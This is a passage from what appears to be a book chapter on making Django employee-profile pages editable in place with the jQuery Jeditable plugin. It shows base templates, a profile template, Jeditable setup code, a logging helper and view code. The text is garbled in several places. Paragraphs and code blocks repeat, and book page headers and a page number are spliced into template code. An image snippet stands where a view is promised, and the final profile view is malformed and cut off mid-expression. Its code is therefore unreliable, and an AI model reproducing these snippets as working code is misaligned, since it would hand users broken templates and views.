There is often a trade-off when it comes to efficiency of CPU vs memory usage. In this post, I will show how the lru_cache decorator can cache results of a function call for quicker future lookup. from functools import lru_cache @lru_cache(maxsize=2**7) def fib(n): if n == 1: return 0 if n == 2: return 1 return f(n - 1) + f(n - 2) In the code above, maxsize indicates the number of calls to store. Setting it to None will make it so that there is no upper bound. The documentation recommends setting it equal to a power of two. Do note though that lru_cache does not make the execution of the lines in the function faster. It only stores the results of the function in a dictionary.
https://brandonrozek.com/blog/pymemoization/
CC-MAIN-2020-24
refinedweb
130
70.53
Google AMP: Code Snippets Google AMP: Code Snippets It has happened to all of us. The standards change, we look at some older code we want to re-factor, and all of a sudden it's not compliant! Well, something happened with Google AMP. Here's one compliance issue that was easy to fix. Join the DZone community and get the full member experience.Join For Free As I've been going through the site and optimizing it for Google AMP, I've experienced some interesting requirements from Google over the past months. But it hasn't been in vain. Based on the feedback from the Google Search Console, Google is starting to index my site for mobile pages. Good news, right? Well, kind of. Here's the rub... You may notice that I still have a lot of pages that aren't indexed. I finally figured out why. My Code Is NOT Compliant To my readers, I provide a lot of ASP.NET MVC code examples on DanylkoWeb. Every time I post a code technique, I provide code samples even with full-source projects. When I copy code from Visual Studio, I use the Productivity Power Tools 2015. It has a feature called Copy As HTML. I've been posting code samples for a long time. Actually, since my site was revived in 2014. But I've been doing it wrong... ...for almost two years. Let's get to the problem at hand instead of reminiscing. Copying Code is NOT Copying Code When you copy your code from Visual Studio, you make sure the code runs (not theoretically), highlight a section of code, and use the Copy As Html under the Edit menu. When you paste, your code becomes HTML readable for your readers. Let's look at an example. When I use "Copy As Html" and paste this simple class into my editor, I get this: HTML of MyClass <pre class="csharpcode"><span style="color:blue;">public</span> <span style="color:blue;">class</span> <span style="color:#2b91af;">MyClass</span>{ <span style="color:blue;">public</span> <span style="color:blue;">string</span> FullName { <span style="color:blue;">get</span>; <span style="color:blue;">set</span>; }}</pre> Looks like a mess, doesn't it? But did you notice the HTML? In-line styles! Oh, the horror! According to Google AMP's style requirements, inline styles are a no-no. So how do we fix this? Well, from this point on, we need to make our code AMP-compliant. - In Visual Studio 2015, Select Tools -> Options (or go to Quick Launch and type 'tools options' and hit Enter). - Click and expand the Productivity Power Tools option. - Set the EmitSpanClass to True - Set the EmitSpanStyle to False What we did was change the pasting of your code to use CSS classes instead of inline styles. Here's what we get now: MyClass public class MyClass { public string FullName { get; set; } } HTML of MyClass <pre class="csharpcode"><span class="keyword">public</span> <span class="keyword">class</span> <span class="class name">MyClass</span> <span class="punctuation">{</span> <span class="keyword">public</span> <span class="keyword">string</span> <span class="identifier">FullName</span> <span class="punctuation">{</span> <span class="keyword">get</span><span class="punctuation">;</span> <span class="keyword">set</span><span class="punctuation">;</span> <span class="punctuation">}</span> <span class="punctuation">}</span> </pre> Notice the classes? Definitely a better way of writing HTML. Now, your CSS can be color-coded easily. Conclusion Today, I explained another piece of the Google AMP puzzle by showing you how even pasted code could cause issues with HTML validators like Google's Structured Data Testing Tool. As I continue to tackle Google AMP pages, I've come to realize that this will be the hardest part of converting my site to become Google AMP-compliant. I'm thinking that a good chunk of that 282 pages (pictured above) are code-related pages (Ugh!). It will be a long and tedious task. It may take me a while to convert them, but I wanted other developers who blog about code to understand the changes required to make their own pages Google AMP-compliant so they don't make the same mistakes as I did. }}
https://dzone.com/articles/google-amp-code-snippets
CC-MAIN-2020-29
refinedweb
707
65.62
VOP_LOOKUP(9) BSD Kernel Manual VOP_LOOKUP(9) VOP_LOOKUP - vnode operations #include <sys/vnode.h> int VOP_CREATE(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp, struct vattr *vap); int VOP_FSYNC(struct vnode *vp, struct ucred *cred, int waitfor, struct proc *p); int VOP_GETEXTATTR(struct vnode *vp, int attrnamespace, const char *name, struct uio *uio, size_t *size, struct ucred *cred, struct proc *p); int VOP_ISLOCKED(struct vnode *); int VOP_LINK(struct vnode *dvp, struct vnode *vp, struct componentname *cnp); int VOP_LOCK(struct vnode *vp, int flags, struct proc *p); int VOP_LOOKUP(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp); int VOP_MKDIR(struct vnode *dvp, struct vnode **vpp, struct componentname *cnp, struct vattr *vap); int VOP_PRINT(struct vnode *vp); int VOP_READLINK(struct vnode *vp, struct uio *uio, struct ucred *cred); int VOP_REALLOCBLKS(struct vnode *vp, struct cluster_save *buflist); int VOP_RECLAIM(struct vnode *vp, struct proc *p); int VOP_REMOVE(struct vnode *dvp, struct vnode *vp, struct componentname *cnp); int VOP_REVOKE(struct vnode *vp, int flags); int VOP_RMDIR(struct vnode *dvp, struct vnode *vp, struct componentname *cnp); int VOP_SETEXTATTR(struct vnode *vp, int attrnamespace, const char *name, struct uio *uio, struct ucred *cred, struct proc *p); int VOP_STRATEGY(struct buf *bp); int VOP_SYMLINK(struct vnode *dvp, struct vnode *vpp, struct componentname *cnp, struct vattr *vap, char *target); int VOP_UNLOCK(struct vnode *vp, int flags, struct proc *p); int VOP_WHITEOUT(struct vnode *dvp, struct componentname *cnp, int flags); The VOP functions implement a generic way to perform operations on vnodes. The VOP function called passes the arguments to the correct file system specific function. Not all file systems implement all operations, in which case a generic method will be used. These functions exist to provide an abstract method to invoke vnode operations without needing to know anything about the underlying file system. Many syscalls map direct- ly to a specific VOP function. The arguments for each VOP function consist of one or more vnode pointers along with other data needed to perform the operation. Care must be taken to obey the vnode locking discipline when using VOP functions. The lock- ing discipline for all currently defined VOP functions is described in the file sys/kern/vnode_if.src. Many VOP calls take a struct proc *p ar- gument. This should be the current process. VOP calls are not safe to call in an interrupt context. The following sections comment on the VOP functions from the consumer's perspective. Some notes for file system implementors follow. VOP_CREATE() creates a new directory entry for a regular file in the directory dvp and returns a locked, referenced vnode in vpp. The file name is in cnp and its permissions will be vap. VOP_FSYNC() flushes any dirty buffers associated with vp to disk. The vnode is locked on entry and exit. waitfor can be set to MNT_WAIT to in- dicate VOP_FSYNC should not return until all data is written. VOP_GETEXTATTR() and VOP_SETEXTATTR() are called to get and set named ex- tended file attributes (see extattr(9)). vp is the vnode for which to get or set the attribute. It must be locked. attrnamespace is an integer describing whether the attribute belongs in the user or system namespace. name is the extended attribute to get or set. uio is a uio(9) structure with the userland address containing the userland data. VOP_GETEXTATTR will return the actual length of the attribute in size if it is non-NULL. cred is a pointer to the credentials used to access the file. VOP_LINK() increases the link count for the vnode vp. A new entry with name cnp should be added to the directory dvp. dvp is locked on entry and unlocked on exit. VOP_LOOKUP() finds the file corresponding to the name cnp in the directo- ry dvp and returns a vnode in vpp. dvp is locked on entry and exit, and vpp is locked upon a successful return. vpp will be NULL on error, and cnp->cn_flags will be set to PDIRUNLOCK if dvp has been unlocked for an unsuccessful return. VOP_MKDIR() implements the mkdir(2) syscall. A new directory with name matching that in cnp and with permissions vattr will be created in the directory dvp. On success, the new vnode is returned locked in vpp. dvp must be locked on entry and is unlocked on exit. VOP_PRINT() prints information about the vnode to the kernel message buffer. It is not used normally, but exists only for debugging purposes. VOP_READLINK() reads a symbolic link and returns the target's name in uio. vp is locked on entry and exit and must be a symlink. VOP_REALLOCBLKS() is called by the vfs write clustering code. It gives the file system an opportunity to rearrange the on disk blocks for a file to reduce fragmentation. vp is the locked vnode for the file, and buflist is a cluster of the outstanding buffers about to written. Currently, only FFS implements this call. VOP_RECLAIM() is used by vclean(9) so that the file system has an oppor- tunity to free memory and perform any other cleanup activity related to vp. vp is unlocked on entry and exit. VOP_RECLAIM should not be used by generic code. VOP_REMOVE() removes the link named cnp from the directory dvp. This file corresponds to the vnode vp. Both dvp and vp are locked on entry and un- locked on exit, and each has its reference count decremented by one. VOP_REMOVE does not delete the file from disk unless its link count be- comes zero (for file systems which support multiple links). VOP_REVOKE() is used by the revoke(2) syscall to prevent any further ac- cess to a vnode. The vnode ops will be changed to those of deadfs, which returns only errors. vp must be unlocked. VOP_RMDIR() implements the rmdir(2) syscall. The directory vp will be re- moved from the directory dvp. Both are locked on entry and unlocked on exit. The name of the directory for removal is additionally contained in cnp. VOP_STRATEGY() is the only VOP call not taking a vnode argument. It calls the appropriate strategy function for the device backing the buffer's vnode. VOP_SYMLINK() creates a symbolic link with name cnp in the directory dvp with mode vap. The link will point to target and a vnode for it is re- turned in vpp. The directory vnode is locked on entry and unlocked on exit. Note that unlike most VOP calls returning a vnode, VOP_SYMLINK does not lock or reference vpp. VOP_LOCK() is used internally by vn_lock(9) to lock a vnode. It should not be used by other file system code. VOP_UNLOCK() unlocks a vnode. flags should be zero in most cases. VOP_ISLOCKED() returns 1 if vp is locked and 0 if not. It should be used cautiously, as not all file sys- tems implement locks effectively. Note the asymmetry between vn_lock and VOP_UNLOCK. VOP_WHITEOUT() manipulates whiteout entries in a directory. dvp is the directory containing, or to contain, the whiteout. It is locked on entry and exit. cnp contains the name of the whiteout. flags is used to indi- cate the operation. Whiteouts may be created or deleted. A whiteout entry is normally used to indicate the absence of a file on a translucent file system. The VOP functions are stubs which redirect their arguments to the ap- propriate function for each file system. In order to allow for layered file systems and generic bypass methods, all vnode operation implementing functions take only a single void * pointer as an argument. This points to a structure containing the real arguments. Additionally, this struc- ture contains a struct vnodeop_desc *, or vnodeop description. The description is typically used by the abstract VOP code, but can be useful to the lower implementation as well. Every file system defines an array of struct vnodeopv_entry_desc that contains one entry for each implement- ed vnode op. Unimplemented vnode operations match the default descrip- tion, vop_default_desc. Most non-layer file systems should assign the de- fault error handler, vn_default_error, to the generic description. All lower level implementations should conform to the interfaces described above. The rules for locking and referencing vnodes are en- forced by each file system implementation, not the VOP stubs. The VOP functions return 0 to indicate success and a non-zero error code to indicate failure. sys/kern/vnode_if.src source file containing VOP definitions sys/kern/vnode_if.c C file with implementations of each VOP stub call errno(2), vn_lock(9), vnode(9) This man page was written by Ted Unangst for OpenBSD. The locking discipline is too complex. Refer to vn_lock(9). MirOS BSD #10-current March 9, 2003.
http://www.mirbsd.org/htman/sparc/man9/VOP_CREATE.htm
CC-MAIN-2014-10
refinedweb
1,432
65.22
This paper addresses the default implementation of the following 8 standard library functions: void* operator new (std::size_t size) throw(std::bad_alloc); void operator delete (void* ptr) throw(); void* operator new (std::size_t size, const std::nothrow_t&) throw(); void operator delete (void* ptr, const std::nothrow_t&) throw(); void* operator new [](std::size_t size) throw(std::bad_alloc); void operator delete[](void* ptr) throw(); void* operator new [](std::size_t size, const std::nothrow_t&) throw(); void operator delete[](void* ptr, const std::nothrow_t&) throw(); Note that all 8 of the above functions are replaceable. And if all 8 are replaced, the requirements on those replacements are clear. What is less clear is the requirements and behavior if only a subset of the above 8 functions are replaced. Why do we care if only a subset of the 8 functions are replaced? Can't we just mandate that either none or all 8 of the above functions must be replaced? Yes, we could do that. In fact that is effectively what we have done since 1998. It isn't working. A common bug is: I've replaced sort with stable_sort as an internal implementation detail in my library. Why are a few of my clients now complaining that my library is causing memory corruption in their applications? The answer to this seemingly bizarre bug report is that stable_sort typically indirectly calls new(nothrow) followed by delete, while sort typically doesn't. When the client replaces operator new/delete but not the nothrow variants, stable_sort crashes whereas sort doesn't. This is just evil. This isn't a idle/rare occurrence. I am writing this paper today in response to yet another customer of mine coming to me with a complaint of this nature. My official answer is that there is a bug in the customer's code: He must replace all eight of these signatures, even if he only wants to replace two. However, my honest answer is that there is a bug in the standard. This all centers on what the default implementations of these functions are required to do. That default implementation is very visible to clients, and incorrectly specified in C++03, and the current (N2135) working draft. In the discussion that follows, when I refer to an operator being replaced, I implicitly assume that the operator no longer directly references whatever memory pool the default operator references (which is typically malloc/free). For simplicity of discussion, the default operators reference the default memory pool, and client-replaced operators reference a distinct client-defined memory pool. It appears to me that if you replace: void* operator new(std::size_t size) throw(std::bad_alloc); Then you must also replace: void operator delete(void* ptr) throw(); I think most people would immediately agree with this statement. If one doesn't link these two operators to the same underlying memory pool, then the delete will not be able to handle pointers that come from new. Furthermore I believe the same statement goes for the other 6 operators. Thus we can immediately separate these 8 functions into 4 cliques of 2 functions each: If you replace one function in a clique you must replace both: But now the next question is: What happens if I replace clique 1 and not clique 2? Or what happens if I replace clique 1 and not clique 3? etc. To answer the above question we need to look more closely at the requirements. For example the requirements for both the nothrow and ordinary (but non-array) versions of operator delete are: Requires: the value of ptr is null or the value returned by an earlier call to the default operator new(std:: size_t) or operator new(std::size_t,const std::nothrow_t&). Ok, so we have a problem right here: These words say that if you replace cliques 1 and 2, then your replaced operator deletes must handle pointers allocated from the default operator new! That can't be right. Surely we mean that if someone replaces cliques 1 and 2 that the delete operators in those cliques need only handle pointers from the replaced new operators in those cliques. What did that Requires: clause intend to say? To find out, let's look at an example use case of operator new(nothrow): A* ap = new(std::nothrow) A; ... delete ap; Right! Clients of new(std::nothrow) are expected to be able to delete those pointers with a simple (non-nothrow) delete. And more generally, the delete operators in cliques 1 and 2 are expected to be able to delete the pointers from the new allocators in cliques 1 and 2. And similarly for cliques 3 and 4. This means that cliques 1 and 2 really form a single group of functions that all refer to the same underlying pool of memory. Similarly for cliques 3 and 4. We can call these two groups A and B. However the above table does not imply that one must implement every signature in a group. It only implies that each signature in a group must refer to the same underlying memory pool. Is there anything the standard can do to make it easy for functions in the same group to refer to the same memory pool, and difficult for them not to? Yes! Consider this proposed default implementation of the signatures in clique 2: void* operator new(std::size_t size, const std::nothrow_t&) throw() // clique 2 { try { return operator new(size); // forward to clique 1 } catch (...) { } return 0; } void operator delete(void* ptr, const std::nothrow_t&) throw() // clique 2 { operator delete(ptr); // forward to clique 1 } With the above default implementation, all the client has to do to replace group A is to just replace the two signatures in clique 1. Since clique 2 forwards to clique 1 (replaced or not), then clique 2 is always linked to clique 1 as it should be. The client can still replace clique 2 if desired. However there is little point in doing so. It must remain linked to clique 1, and not doing so will result in a run time error when delete is called with a pointer from new(nothrow). There is no advantage in easily allowing clique 2 to become unlinked from clique 1. And there is every advantage in actively discouraging cliques 1 and 2 from becoming unlinked. They must be linked or a run time crash is inevitable. Everything I've said about the relationship between cliques 1 and 2 also applies to cliques 3 and 4. Cliques 3 and 4 must always be linked. That implies that the proper default implementation of clique 4 simply forwards to clique 3: void* operator new[](std::size_t size, const std::nothrow_t&) throw() // clique 4 { try { return operator new[](size); // forward to clique 3 } catch (...) { } return 0; } void operator delete(void* ptr, const std::nothrow_t&) throw() // clique 4 { operator delete[](ptr); // forward to clique 3 } The above is the bare minimum the standard must do in order to keep the standard library from being extremely fragile. We have now established firm reasoning for why clique 2 should forward to clique 1, and clique 4 should forward to clique 3. But should we (by default) link groups A and B by having clique 3 forward to clique 1? I.e. implement the array operators in terms of the non-array operators. I believe that this is the question actually originally answered in LWG 206. Note that the actual question of LWG 206 was the issue of linking the nothrow and throwing versions of the operators as discussed in the previous sections. They must not become unlinked. However the same is not true of array vs non-array. The reason groups A and B do not have to be linked is because the delete operators in group A never have to deal with pointers from the new operators in group B. Similarly the delete operators in group B never have to deal with pointers from the new operators in group A. Thus if the groups refer to different underlying memory pools (become unlinked), no harm (as in crashing) is done. The original 1998 and 2003 C++ standards partially link groups A and B. The default operator new[] is specified to call operator new. However the operator delete[] does not have the corresponding specification to call operator delete. LWG 298 corrects that inconsistency by specifying operator delete[] calls operator delete. Thus the current (N2135) working draft links groups A and B. The following test was run on various compilers and platforms. It detects whether groups A and B are linked or not by replacing the non-array operators, and then calling the array operators and observing if the replaced operators are called or not. #include <cstdio> #include <cstdlib> #include <new> void* operator new(std::size_t size) throw(std::bad_alloc) { std::printf("custom allocation\n"); if (size == 0) size = 1; void*p = std::malloc(size); if (p == 0) throw std::bad_alloc(); return p; } void operator delete(void* ptr) throw() { std::printf("custom deallocation\n"); std::free(ptr); } int main() { std::printf("begin main\n"); int* i = new int; delete i; std::printf("---\n"); int* a = new int[3]; delete [] a; std::printf("end main\n"); } The following tools indicated complete linkage between groups A and B: The following tools indicated no linkage between groups A and B: The following tool indicated inconsistent linkage between groups A and B: Given that the current (N2135) working draft and several (prominent) compilers currently link groups A and B, this paper recommends to not change the current (N2135) working draft (with respect to A/B linkage) and thus continue linking groups A and B. The default implementation of the clique 3 operators should forward to clique 1: void* operator new[](std::size_t size) throw(std::bad_alloc) // clique 3 { return operator new(size); // forward to clique 1 } void operator delete[](void* ptr) throw() // clique 3 { operator delete(ptr); // forward to clique 1 } With the above recommendations, clients will be able to replace both groups A and B by simply replacing clique 1. Indeed, this is the most common intention of replacing the new and delete operators. If clients wish to treat array allocations differently from non-array allocations, the client can still safely and easily unlink groups A and B by replacing both cliques 1 and 3, and have them refer to different memory pools. There is little motivation for replacing cliques 2 or 4, but of course that is still allowed by this proposal as long as the replacements continue to link to cliques 1 and 3 respectively. Proposed wording to accomplish the recommendations of this paper is provided below. The differences are with respect to the current (N2135) working draft. Change 18.5.1.1 [new.delete.single]: may define a function with this function signature that displaces the default version defined by the C++ Standard library. -7- Required behavior: Return a non-null pointer to suitably aligned storage (3.7.4), or else return a null pointer. This nothrow version of operator new returns a pointer obtained as if acquired from the ordinary version. This requirement is binding on a replacement version of this function. -8- Default behavior: - Executes a loop: Within the loop, the function first attempts to allocate the requested storage. Whether the attempt involves a call to the Standard C library function malloc is unspecified. - Returns a pointer to the allocated storage if the attempt is successful. Otherwise, if the last argument to set_new_handler() was a null pointer, return a null pointer. - Otherwise, the function calls the current new_handler (18.5.2.2). If the called function returns, the loop repeats. - The loop terminates when an attempt to allocate the requested storage is successful or when a called new_handler function does not return. If the called new_handler function terminates by throwing a bad_alloc exception, the function returns a null pointer. -9- [Example:T* p1 = new T; // throws bad_alloc if it fails T* p2 = new(nothrow) T; // returns 0 if it fails --end example]void operator delete(void* ptr) throw(); void operator delete(void* ptr, const std::nothrow_t&) throw(); -10- Effects: The deallocation function (3.7.4.2) called by a delete-expression to render the value of ptr invalid. -11- Replaceable: a C++ program may define a function with this function signature that displaces the default version defined by the C++ Standard library. -12- Requires: the value of ptr is null or the value returned by an earlier call to the defaultoperator new(std::size_t) or operator new(std::size_t, const std::nothrow_t&). -13- Default behavior: - For a null value of ptr, do nothing. - Any other value of ptr shall be a value returned earlier by a call to the default operator new, which was not invalidated by an intervening call to operator delete(void*) (17.4.3.7). For such a non-null value of ptr, reclaims storage allocated by the earlier call to the default operator new. -14- Remarks: It is unspecified under what conditions part or all of such reclaimed storage is allocated by a subsequent call to operator new or any of calloc, malloc, or realloc, declared in <cstdlib>. Change 18.5.1.2 [new.delete.array] can define a function with this function signature that displaces the default version defined by the C++ Standard library. -7- Required behavior: Same as for operator new(std::size_t, const std::nothrow_t&). This nothrow version of operator new[] returns a pointer obtained as if acquired from the ordinary version. -8- Default behavior: Returns operator new(size, nothrow). void operator delete[](void* ptr) throw(); void operator delete[](void* ptr, const std::nothrow_t&) throw(); -9- Effects: The deallocation function (3.7.4.2) called by the array form of a delete-expression to render the value of ptr invalid. -10- Replaceable: a C++ program can define a function with this function signature that displaces the default version defined by the C++ Standard library. -11- Requires: the value of ptr is null or the value returned by an earlier call to operator new[](std::size_t) or operator new[](std::size_t, const std::nothrow_t&). -12- Default behavior: Calls operator delete(ptr) or operator delete(ptr , std::nothrow) respectively. I would like to thank David Harmon, Rahtgaz, and Alexey Sarytchev for help in surveying existing practice.
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2158.html
crawl-001
refinedweb
2,386
51.07
(For more resources on this subject, see here.) This will allow us to create a results page as shown: When someone clicks OK, the data is saved on the server, and also shown on the page. Let's get started on how this works. Including a plugin We include a jQuery plugin on a page by including jQuery, then including the plugin (or plugins, if we have more than one). In our base.html, we update: {% block footer_javascript_site %} <script language="JavaScript" type="text/javascript" src="/static/js/jquery.js"></script> <script language="JavaScript" type="text/javascript" src="/static/js/jquery-ui.js"></script> <script language="JavaScript" type="text/javascript" src="/static/js/jquery.jeditable.js"></script> {% endblock footer_javascript_site %} This is followed by the footer_javascript_section and footer_javascript_page blocks. This means that if we don't want the plugin ,which is the last inclusion, to be downloaded for each page, we could put it in overridden section and page blocks. This would render as including the plugin after jQuery. How to make pages more responsive We would also note that the setup, with three JavaScript downloads, is appropriate for development purposes but not for deployment. In terms of YSlow client-side performance optimization, the recommended best practice is to have one HTML/XHTML hit, one CSS hit at the top, and one JavaScript hit at the bottom. One of the basic principles of client-side optimization, discussed by Steve Souders (see) is,since HTTP requests slow the page down, the recommended best practice is to have one (preferably minifed) CSS inclusion at the top of the page, and then one (preferably minifed) JavaScript inclusion at the bottom of each page. Each HTTP request beyond this makes things slower, so combining CSS and/or JavaScript requests into a single concatenated file is low-hanging fruit to improve how quick and responsive your web pages appear to users. For deployment, we should minify and combine the JavaScript. As we are developing, we also have JavaScript included in templates and rendered into the delivered XHTML; this may be appropriate for development purposes. For deployment though, as much shared functionality as possible should be factored out into an included JavaScript fle. For content that can be delivered statically, such as CSS, JavaScript, and even non-dynamic images, setting far-future Expires/Cache-Control headers is desirable. (One practice is to never change the content of a published URL for the kind of content that has a far-future expiration set, and then if it needs updating, instead of changing the content at the same location, leave the content where it is, publish at a new location possibly including a version number, and reference the new location.) A template handling the client-side requirements Here's the template. Its view will render it with an entity and other information. At present it extends the base directly; it is desirable in many cases to have the templates that are rendered extend section templates, which in turn extend the base. In our simple application, we have two templates which are directly rendered to web pages. One is the page that handles both search and search results—and the other, the page that handles a profile, from the following template: {% extends "base.html" %} We include honorifics before the name, and post-nominals after. At this point we do not do anything to make it editable. {% extends "base.html" %} Following earlier discussion, we include honorifcs before the name, and post-nominals after. At this point we do not do anything to make it editable. {% block head_title %} {{ entity.honorifics }} {{ entity.name }} {{ entity.post_nominals }} {% endblock head_title %} {% block body_main %} There is one important point about Django and the title block. The Django developers do not fnd it acceptable to write a templating engine that produces errors in production if someone attempts to access an undefned value (by typos, for instance). As a result of this design decision, if you attempt to access an undefned value, the templating engine will silently insert an empty string and move on. This means that it is safe to include a value that may or may not exist, although there are ways to test if a value exists and is nonempty, and display another default value in that case. We will see how to do this soon. Let's move on to the main block, defned by the last line of code. Once we are in the main block, we have an h1 which is almost identical to the title block, but this time it is marked up to support editing in place. Let us look at the honorifics span; the name and post_nominals spans work the same way: <h1> <span id="Entity_honorifics_{{ entity.id }}" class="edit"> {% if entity.honorifics %} {{ entity.honorifics }} {% else %} Click to edit. {% endif %} </span> The class edit is used to give all $(".edit") items some basic special treatment with Jeditable; there is nothing magical about the class name, which could have been replaced by user-may-change-this or something else. edit merely happens to be a good name choice, like almost any good variable/function/object name. We create a naming convention in the span's HTML ID which will enable the server side to know which—of a long and possibly open-ended number of things we could intend to change—is the one we want. In a nutshell, the convention is modelname_feldname_instanceID. The frst token is the model name, and is everything up to the first underscore. (Even if we were only interested in one model now, it is more future proof to design so that we can accommodate changes that introduce more models.) The last token is the instance ID, an integer. The middle token, which may contain underscores (for example post_nominals in the following code), is the feld name. There is no specifc requirement to follow a naming convention, but it allows us to specify an HTML ID that the server-side view can parse for information about which feld on which instance of which model is being edited. We also provide a default value, in this case Click to edit, intended not only to serve as a placeholder, but to give users a sense on how this information can be updated. We might also observe that here and in the following code, we do not presently have checks against race conditions in place. So nothing here or in the following code will stop users from overwriting each others' changes. This may be taken as a challenge to refne and extend the solution to either prevent race conditions or mitigate their damage. <span id="Entity_name_{{ entity.id }}" class="edit"> {% if entity.name %} {{ entity.name }} {% else %} Click to edit. {% endif %} </span> <span id="Entity_post_nominals_{{ entity.id }}" class="edit"> {% if entity.post_nominals %} {{ entity.post_nominals }} {% else %} Click to edit. {% endif %} </span> </h1> This approach is an excellent frst approach but in practice is an h1 with three slots that say Click to edit on a profle, creating needless confusion. We move to a simplifed: <span id="Entity_name_{{ entity.id }}" class="edit"> {% if entity.name %} {{ entity.name }}jQuery In-place Editing Using Ajax {% else %} Click to edit. {% endif %} </span> <span id="Entity_post_nominals_{{ entity.id }}" class="edit"> {% if entity.post_nominals %} {{ entity.post_nominals }} {% else %} Click to edit. {% endif %} </span> </h1> Taken together, the three statements form the heading in this screenshot: If we click on the name (for instance) it becomes: The image is presently a placeholder; this should be expanded to allow an image to be uploaded if the user clicks on the picture (implementing consistent-feeling behavior whether or not we do so via the same plugin). We also need the view and urlpattern on the backend: <h1 class="edit" id="Entity_name_{{ entity.id }}"> {{ entity.name }} </h1> (For more resources on this subject, see here.) The bulk of the profile For small bits of text, we use the edit CSS class, which will be transformed to an input of type text on click (or double-click or mouseover, if we were using Jeditable differently). The description is an example of something that would more naturally lend itself to a textarea, so we will use the edit_textarea CSS class, which will be confgured to use a textarea. {% if entity.image %} <img src="/images/{{ entity.id }}" alt="{{ entity.name }}"> {% endif %}jQuery In-place Editing Using Ajax The Department, as well as Reports to feld, are not arbitrary text in our implementation; they are another entity (if one is specifed). This could appropriately enough be implemented as a dropdown menu, but even a carefully pruned dropdown menu could be long and unwieldy for a large company. One additional note on usability: When displaying "label: value" information on pages, particularly heavily used pages, the most basic option is not to use any emphasis: Name: J. Smith To help people's eyes fnd what they want, one obvious solution is to emphasize the label, as in: Name: J. Smith This works well the frst time. However, if people are looking at the same set of felds, in the same order, on a web page they visit repeatedly, it is no longer best to emphasize the labels. Regular visitors already know what the labels are, and the motive for even looking at the labels is to see the value. Therefore, for our directory, we will be using bold for the value rather than the label: Name: J. Smith <p> Description <strong id="Entity_description_{{ entity.id }}" class="edit_textarea"> {{ entity.description }} </strong> </p> If a homepage is defned, we give the URL, wrapped in a link and a strong that makes the link editable by right clicking. If the link were just editable by a regular click, Jeditable would short-circuit the usual and expected behavior of clicking on a link taking you to the corresponding page or opening the corresponding e-mail. To allow editing while also allowing normal use of links on a profle page, we assign the right click rather than click event to be the way to allow editing. From a UI consistency perspective, it might be desirable to additionally always allow a right click to trigger any (possible) editing. However, we will leave that on our wishlist for now. We will defne JavaScript later on in this chapter that will add desired behavior. Whitespace and delivery The formatting used above is preferable for development; for actual delivery, we may wish to strip out all whitespace that can be stripped out, for this page: <p>Department: <strong> {{ entity.department.name }} </strong> <p>Homepage: {% if entity.homepage %} <a href="{{ entity.homepage }}"> {% endif %} <strong class="edit_rightclick" id="Entity_homepage_{{ entity.id }}"> {% if entity.homepage %} {{ entity.homepage }} {% else %} Right click to change. {% endif %} </strong> {% if entity.homepage %} </a> {% endif %} </p> Some browsers now are better about this, but it has happened in the past that if you have whitespace such as a line break between the intended text of a link and the tag, you could get unwanted trailing whitespace with a visible underline on the rendered link. In addition, pages load faster if minifed. For development purposes, though, we will add whitespace for clarity. In the next code, we will have a spurious space before rendered commas because we are not stripping out unnecessary whitespace: {% if entity.homepage %}<a href="{{ entity.homepage }}">{% endif %}<strong class="edit_rightclick" id="entity_homepage_{{ entity.id }}">{% if entity.homepage %}{{ entity.homepage }}{% else %}Right click to change.{% endif %}</strong>{% if entity.homepage %}</a>{% endif %}<br /> This allows e-mails to be added, like so: For the Location field, we are deferring an intelligent way to let people choose an existing location, or create a new one, until the next chapter. For now we simply display a location's identifer, which is meant as a human-readable identifer rather than a machine-readable primary key or other identifer: <p>Email: <strong> {% for email in emails %}jQuery In-place Editing Using Ajax <a id="EntityEmail_email_{{ email.id }}" class="edit_rightclick" href="mailto:{{ email.email }}"> </a> {% if not forloop.last %} , {% endif %} {% endfor %} <span class="edit" id="EntityEmail_new_{{ entity.id }}"> Click to add email. </span> </strong> </p> This entails a change to the Location model, to allow: <p>Location: <strong> {{ entity.location.identifier }} </strong> </p> The Phone field is the last one that is user editable. class Location(models.Model): identifier = models.TextField(blank = True) description = models.TextField(blank = True) office = models.CharField(max_length = 2, choices = OFFICE_CHOICES, blank = True) room = models.TextField(blank = True) coordinates = GPSField(blank = True) The following felds are presently only displayed. The Reports to feld should be autocomplete based. The Start date feld might well enough be left alone as a feld that should not need to be updated, or for demonstration purposes it could be set to a jQuery UI datepicker, which would presumably need to have Ajax saving functionality added. <p>Phone: <strong class="edit" id="Entity_phone_{{ entity.id }}"> {% if entity.phone %} {{ entity.phone }} {% else %} Click to edit. {% endif %} </strong> </p> Page-specific JavaScript The page-specific JavaScript follows. The first few lines enable the edit, edit_rightclick, and edit_textarea CSS classes to have in-place editing: <p>Reports to: <strong> {{ entity.reports_to.name }} </strong> </p>jQuery In-place Editing Using Ajax [ 136 ] <p>Start date: <strong> {{ entity.start_date }} </strong> </p> {% endblock body_main %} Page-specific JavaScript The page-specifc JavaScript follows. The frst few lines enable the edit, edit_rightclick, and edit_textarea CSS classes to have in-place editing: {% block footer_javascript_page %} <script language="JavaScript" type="text/javascript"> <!-- function register_editables() { $(".edit").editable("/ajax/save", { cancel: "Cancel", submit: "OK", tooltip: "Click to edit.", }); $(".edit_rightclick").editable("/ajax/save", { cancel: "Cancel", submit: "OK", tooltip: "Right click to edit.", event: "contextmenu", }); $(".edit_textarea").editable("/ajax/save", { cancel: "Cancel", submit: "OK", tooltip: "Click to edit.", type: "textarea", }); } $(function() { register_editables(); }); // --> </script> {% endblock footer_javascript_page %} Support on the server-side This function provides a rather unadorned logging of changes. This could be expanded to logging in a form intended for machine parsing, display in views, and so on in functions.py: def log_message(message): log_file = os.path.join(os.path.dirname(__file__), directory.settings.LOGFILE) open(log_file, u'a').write(u"%s: %s\n" % (time.asctime(), In settings.py, after the DATABASE_PORT is set: # Relative pathname for user changes logfile for directory LOGFILE = u'log' In the urlpattern in urls.py: (ur'^ajax/save', views.save), (ur'^profile/(\d+)$', views.profile), In views.py, our import section has grown to the following: from django.contrib.auth import authenticate, login from django.contrib.auth.decorators import login_required from django.core import serializers from django.db.models import get_model from django.http import HttpResponse from django.shortcuts import render_to_response from django.template import Context, Template from django.template.defaultfilters import escape from django.template.loader import get_template from directory.functions import ajax_login_required import directory.models import json import re In views.py proper, we defne a profle view, with the regular @login_required decorator. (We use @ajax_login_required for views that return JSON or other data for Ajax requests, and @login_required for views that return a full web page.) @login_required def profile(request, id): entity = directory.models.Entity.objects.get(pk = id) entity__exact = id).all() return HttpResponse(get_template(u'profile.html').render(Context( 